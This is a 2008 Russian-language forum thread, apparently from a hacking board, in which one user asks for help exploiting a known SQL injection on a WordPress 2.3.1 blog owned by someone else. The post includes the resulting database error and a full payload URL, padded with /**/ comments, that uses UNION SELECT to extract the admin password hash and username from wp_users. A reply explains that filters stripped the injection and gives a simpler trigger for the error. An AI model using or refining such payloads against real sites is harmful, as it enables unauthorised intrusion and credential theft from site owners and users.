PDA

Просмотр полной версии : SQL Inj (wp)


n0mie
28.05.2008, 12:17
Приветствую!

Есть блог на wp 2.3.1. Насколько я понимаю, подвержен вот этому http://securityvulns.ru/Sdocument563.html, при попытке использовать выдаёт


WordPress database error: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND comment_approved = '1' ORDER BY comment_date_gmt DESC LIMIT 10' at line 1]
SELECT wp_comments.* FROM wp_comments WHERE comment_post_ID = AND comment_approved = '1' ORDER BY comment_date_gmt DESC LIMIT 10

Warning: Cannot modify header information - headers already sent by (output started at /mnt/web6/30/81/5488681/htdocs/blog/wp-includes/wp-db.php:159) in /mnt/web6/30/81/5488681/htdocs/blog/wp-includes/feed-rss2-comments.php on line 2
Alles УМber die Computerschule Niederrad! Tue, 27 May 2008 21:05:55 +0000 http://wordpress.org/?v=2.3.1

В данном случае нельзя испольовать sql inj или просто руки у меня не из того места растут? Если последннее, то буду благодарен за разъяснения, каким образом я могу использовать данную уязвимость.

спасибо.

Tigger
28.05.2008, 12:26
Дай ссылку ту, что ты в браузер вставляешь...

n0mie
28.05.2008, 12:59
http://www.xxxxx.de/blog/?feed=rss2&p=100/**/union/**/select/**/concat(user_password,char(100),username),2/**/from/**/wp_users/**/where/**/user_id=1/*

сам домен в личку скинул

Mr.Jobson
29.05.2008, 18:52
не работает потому, что нет инъекции.
Ваша воображаемая инъекция была съедена фильтрами. Таким образом до запроса дошла пустая строка(номер поста не был найден) и получилось вот что: "comment_post_ID =(СМОТРЕТЬ СЮДА) AND comment_approved"
Просто невалидный запрос. Кстати его можно вызвать и без кавычек с тем же успехом - ?feed=rss2&p=-1

Кстати почитать можно еще тут http://trac.wordpress.org/ticket/5185